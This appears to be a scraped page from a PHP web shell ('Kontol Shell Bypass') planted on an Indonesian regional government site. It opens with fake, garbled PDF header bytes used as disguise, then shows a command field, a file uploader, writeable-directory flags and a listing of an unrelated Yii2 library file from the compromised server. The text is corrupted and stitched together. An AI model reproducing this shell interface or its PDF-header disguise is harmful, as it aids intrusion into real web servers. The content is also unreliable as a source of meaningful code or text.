%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/kartik-v/yii2-widget-alert/src/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/kartik-v/yii2-widget-alert/src/AlertTrait.php
<?php

/**
 * @copyright Copyright &copy; Kartik Visweswaran, Krajee.com, 2014 - 2021
 * @package yii2-widgets
 * @subpackage yii2-widget-alert
 * @version 1.1.5
 */

namespace kartik\alert;

/**
 * Alert properties trait for [[Alert]], [[AlertBs4]] and [[AlertBs3]] widgets
 *
 * @author Kartik Visweswaran <kartikv2@gmail.com>
 * @since 1.0
 */
trait AlertTrait
{
    /**
     * @var string the type of the alert to be displayed. One of the `TYPE_` constants.
     */
    public $type;

    /**
     * @var string the icon type. Can be either 'class' or 'image'. Defaults to 'class'.
     */
    public $iconType;

    /**
     * @var string the class name for the icon to be displayed. If set to empty or null, will not be displayed.
     */
    public $icon;

    /**
     * @var array the HTML attributes for the icon.
     */
    public $iconOptions;

    /**
     * @var string the title for the alert. If set to empty or null, will not be displayed.
     */
    public $title;

    /**
     * @var array the HTML attributes for the title. The following options are additionally recognized:
     *
     * - `tag`: _string_, the HTML tag to render the title. Defaults to `span`.
     */
    public $titleOptions;

    /**
     * @var boolean show the title separator. Only applicable if [[title]] is set.
     */
    public $showSeparator;

    /**
     * @var integer the delay in microseconds after which the alert will be displayed. Will be useful when multiple
     * alerts are to be shown.
     */
    public $delay;
}

Kontol Shell Bypass